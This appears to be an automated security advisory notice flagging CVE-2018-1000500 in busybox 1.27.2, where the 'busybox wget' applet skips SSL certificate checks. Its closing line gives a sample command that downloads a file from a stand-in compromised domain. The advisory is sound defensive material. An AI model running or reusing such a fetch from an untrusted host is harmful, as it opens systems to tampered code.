Automated analysis has detected that the following third party packages have had vulnerabilities publicly reported. 

NOTE: There may be several bugs listed below - in almost all cases, all bugs can be quickly addressed by upgrading to the latest version of the package.

Package Name: sys-apps/busybox
Package Version: [cpe:/a:busybox:busybox:1.27.2]

Advisory: CVE-2018-1000500
  Details: https://vomit.googleplex.com/advisory?id=CVE/CVE-2018-1000500
  CVSS severity score: 6.8/10.0
  Confidence: high
  Description:

Busybox contains a Missing SSL certificate validation vulnerability in The "busybox wget" applet that can result in arbitrary code execution. This attack appear to be exploitable via Simply download any file over HTTPS using "busybox wget https://compromised-domain.com/important-file".